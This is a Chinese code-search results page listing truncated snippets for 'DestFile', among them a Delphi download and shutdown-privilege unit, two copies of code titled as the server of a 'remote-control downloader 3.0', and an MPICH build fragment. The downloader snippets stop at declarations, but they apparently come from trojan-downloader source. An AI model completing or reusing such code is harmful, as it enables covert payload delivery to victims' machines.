代码搜索:DestFile
找到约 147 项符合「DestFile」的源代码
代码结果 147
www.eeworm.com/read/188732/8517819
pas fun2.pas
unit fun2;
interface
uses
windows, messages, URLMon, Sysutils, Classes, Tlhelp32;
procedure AdjustToken(); //获取关机权限
function Dlf(SourceFile, DestFile: string): Boolean; //从网上
www.eeworm.com/read/246495/12722151
txt 遥控下载者3.0 服务端代码.txt
program Server;
uses Windows,Winsock,urlmon;
const
BufSize=1024;
var
buf :array[0..BufSize-1] of char;
function DownloadToFile(Sourcefile, Destfile: string): Boolean; //下载函数
begin
try
R
www.eeworm.com/read/242544/12999359
txt 遥控下载者3.0 服务端代码.txt
program Server;
uses Windows,Winsock,urlmon;
const
BufSize=1024;
var
buf :array[0..BufSize-1] of char;
function DownloadToFile(Sourcefile, Destfile: string): Boolean; //下载函数
begin
try
R
www.eeworm.com/read/169697/5412053
m4 mpid_thread.m4
if test "$MPICH_THREAD_LEVEL" = "MPI_THREAD_SINGLE" -o "$MPICH_THREAD_LEVEL" = "MPI_THREAD_FUNNELED" ; then
MPID_THREAD_TYPEDEFS="/dev/null"
MPID_THREAD_FUNCS="/dev/null"
MPI_THREAD_SOURCE